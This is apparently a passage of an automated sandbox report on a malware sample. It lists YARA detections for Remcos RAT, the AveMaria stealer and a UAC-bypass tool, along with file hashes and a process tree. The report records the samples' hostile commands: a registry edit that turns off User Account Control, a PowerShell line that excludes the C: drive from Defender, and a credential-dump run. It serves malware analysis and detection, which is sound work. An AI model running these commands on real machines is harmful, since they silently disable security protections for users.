                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000000.672609321.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000000.674013020.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.682814093.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000002.00000003.676858560.0000000000797000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000002.00000003.676858560.0000000000797000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.676858560.0000000000797000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000002.00000003.676858560.0000000000797000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              Reputation:low

                                                                                              Chronological Activities

                                                                                              Analysis Process: bin.exe PID: 7116 Parent PID: 7008

                                                                                              General

                                                                                              Start time:13:38:41
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\bin.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\bin.exe" 0
                                                                                              Imagebase:0xd0000
                                                                                              File size:115712 bytes
                                                                                              MD5 hash:805FBB84293E86F25B566A5B2C2815D2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.684193866.0000000000D36000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.680253617.00000000000E4000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000000.680253617.00000000000E4000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.929087269.00000000000E4000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000002.929087269.00000000000E4000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000002.929833680.000000000021F000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000002.929833680.000000000021F000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.684219433.0000000000D12000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.684219433.0000000000D12000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.684269184.0000000000D36000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000002.939479958.000000000362C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.684248310.0000000000D0E000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000003.684248310.0000000000D0E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.684299780.0000000000D0E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.684299780.0000000000D0E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000002.939106389.0000000002CD6000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000000.680273151.000000000021F000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000000.680273151.000000000021F000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Florian Roth
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Florian Roth
                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: Joe Security
                                                                                              • Rule: AveMaria_WarZone, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\bin.exe, Author: unknown
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              Reputation:low

                                                                                              Chronological Activities

                                                                                              Analysis Process: rem9090sta.exe PID: 7136 Parent PID: 7008

                                                                                              General

                                                                                              Start time:13:38:42
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\rem9090sta.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\rem9090sta.exe" 0
                                                                                              Imagebase:0x400000
                                                                                              File size:474112 bytes
                                                                                              MD5 hash:083D4CDE33E6721F595A468BB7D17ADA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.701188305.000000000065A000.00000004.00000020.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000000.681886689.0000000000454000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, Author: Joe Security
                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, Author: unknown
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              Reputation:low

                                                                                              Chronological Activities

                                                                                              Analysis Process: cmd.exe PID: 7156 Parent PID: 7136

                                                                                              General

                                                                                              Start time:13:38:42
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                              Imagebase:0x11d0000
                                                                                              File size:232960 bytes
                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Chronological Activities

                                                                                              Analysis Process: conhost.exe PID: 4812 Parent PID: 7156

                                                                                              General

                                                                                              Start time:13:38:43
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff724c50000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Chronological Activities

                                                                                              Analysis Process: reg.exe PID: 6204 Parent PID: 7156

                                                                                              General

                                                                                              Start time:13:38:43
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                              Imagebase:0x12b0000
                                                                                              File size:59392 bytes
                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Chronological Activities

                                                                                              Analysis Process: powershell.exe PID: 6324 Parent PID: 7116

                                                                                              General

                                                                                              Start time:13:38:43
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell Add-MpPreference -ExclusionPath C:\
                                                                                              Imagebase:0xfa0000
                                                                                              File size:430592 bytes
                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Reputation:high

                                                                                              Chronological Activities

                                                                                              Analysis Process: cmd.exe PID: 5984 Parent PID: 7116

                                                                                              General

                                                                                              Start time:13:38:44
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\cmd.exe
                                                                                              Imagebase:0x11d0000
                                                                                              File size:232960 bytes
                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: AveMaria_WarZone, Description: unknown, Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, Author: unknown
                                                                                              Reputation:high

                                                                                              Chronological Activities

                                                                                              Analysis Process: conhost.exe PID: 2524 Parent PID: 6324

                                                                                              General

                                                                                              Start time:13:38:44
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff724c50000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Chronological Activities

                                                                                              Analysis Process: conhost.exe PID: 1328 Parent PID: 5984

                                                                                              General

                                                                                              Start time:13:38:44
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff724c50000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Chronological Activities

                                                                                              Analysis Process: wscript.exe PID: 3740 Parent PID: 7136

                                                                                              General

                                                                                              Start time:13:38:50
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
                                                                                              Imagebase:0x220000
                                                                                              File size:147456 bytes
                                                                                              MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Chronological Activities

                                                                                              Analysis Process: remcos.exe PID: 4200 Parent PID: 3424

                                                                                              General

                                                                                              Start time:13:38:54
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:474112 bytes
                                                                                              MD5 hash:083D4CDE33E6721F595A468BB7D17ADA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.932016894.0000000000454000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000000.709586712.0000000000454000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.935198741.000000000064A000.00000004.00000020.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe, Author: Joe Security
                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe, Author: unknown
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              Reputation:low

                                                                                              Chronological Activities

                                                                                              Analysis Process: cmd.exe PID: 6620 Parent PID: 3740

                                                                                              General

                                                                                              Start time:13:38:55
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              Imagebase:0x11d0000
                                                                                              File size:232960 bytes
                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Chronological Activities

                                                                                              Analysis Process: conhost.exe PID: 2368 Parent PID: 6620

                                                                                              General

                                                                                              Start time:13:38:56
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff724c50000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Chronological Activities

                                                                                              Analysis Process: cmd.exe PID: 6076 Parent PID: 4200

                                                                                              General

                                                                                              Start time:13:38:56
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                              Imagebase:0x11d0000
                                                                                              File size:232960 bytes
                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              Chronological Activities

                                                                                              Analysis Process: remcos.exe PID: 3228 Parent PID: 6620

                                                                                              General

                                                                                              Start time:13:38:56
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              Imagebase:0x400000
                                                                                              File size:474112 bytes
                                                                                              MD5 hash:083D4CDE33E6721F595A468BB7D17ADA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000000.713254568.0000000000454000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.715029583.0000000000757000.00000004.00000020.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.714713917.0000000000454000.00000002.00020000.sdmp, Author: Joe Security

                                                                                              Chronological Activities

                                                                                              Analysis Process: conhost.exe PID: 3844 Parent PID: 6076

                                                                                              General

                                                                                              Start time:13:38:56
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff724c50000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              Chronological Activities

                                                                                              Analysis Process: reg.exe PID: 7092 Parent PID: 6076

                                                                                              General

                                                                                              Start time:13:38:57
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                              Imagebase:0x12b0000
                                                                                              File size:59392 bytes
                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              Chronological Activities

                                                                                              Analysis Process: rdpvideominiport.sys PID: 4 Parent PID: -1

                                                                                              General

                                                                                              Start time:13:39:01
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\System32\drivers\rdpvideominiport.sys
                                                                                              Wow64 process (32bit):
                                                                                              Commandline:
                                                                                              Imagebase:
                                                                                              File size:30616 bytes
                                                                                              MD5 hash:0600DF60EF88FD10663EC84709E5E245
                                                                                              Has elevated privileges:
                                                                                              Has administrator privileges:
                                                                                              Programmed in:C, C++ or other language

                                                                                              Chronological Activities

                                                                                              Analysis Process: rdpdr.sys PID: 4 Parent PID: -1

                                                                                              General

                                                                                              Start time:13:39:01
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\System32\drivers\rdpdr.sys
                                                                                              Wow64 process (32bit):
                                                                                              Commandline:
                                                                                              Imagebase:
                                                                                              File size:182784 bytes
                                                                                              MD5 hash:52A6CC99F5934CFAE88353C47B6193E7
                                                                                              Has elevated privileges:
                                                                                              Has administrator privileges:
                                                                                              Programmed in:C, C++ or other language

                                                                                              Chronological Activities

                                                                                              Analysis Process: tsusbhub.sys PID: 4 Parent PID: -1

                                                                                              General

                                                                                              Start time:13:39:02
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\System32\drivers\tsusbhub.sys
                                                                                              Wow64 process (32bit):
                                                                                              Commandline:
                                                                                              Imagebase:
                                                                                              File size:126464 bytes
                                                                                              MD5 hash:3A84A09CBC42148A0C7D00B3E82517F1
                                                                                              Has elevated privileges:
                                                                                              Has administrator privileges:
                                                                                              Programmed in:C, C++ or other language

                                                                                              Chronological Activities

                                                                                              Analysis Process: bin.exe PID: 6472 Parent PID: 3424

                                                                                              General

                                                                                              Start time:13:39:03
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\bin.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\bin.exe"
                                                                                              Imagebase:0xd0000
                                                                                              File size:115712 bytes
                                                                                              MD5 hash:805FBB84293E86F25B566A5B2C2815D2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.730867358.00000000000E4000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000001D.00000002.730867358.00000000000E4000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000001D.00000000.726336718.000000000021F000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000001D.00000000.726336718.000000000021F000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000001D.00000002.730907039.000000000021F000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000001D.00000002.730907039.000000000021F000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000000.726305427.00000000000E4000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000001D.00000000.726305427.00000000000E4000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmp, Author: Joe Security

                                                                                              Chronological Activities

                                                                                              Analysis Process: remcos.exe PID: 3228 Parent PID: 4200

                                                                                              General

                                                                                              Start time:13:39:04
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\jmtceghqeepjeivm"
                                                                                              Imagebase:0x400000
                                                                                              File size:474112 bytes
                                                                                              MD5 hash:083D4CDE33E6721F595A468BB7D17ADA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000000.728375820.0000000000454000.00000002.00020000.sdmp, Author: Joe Security

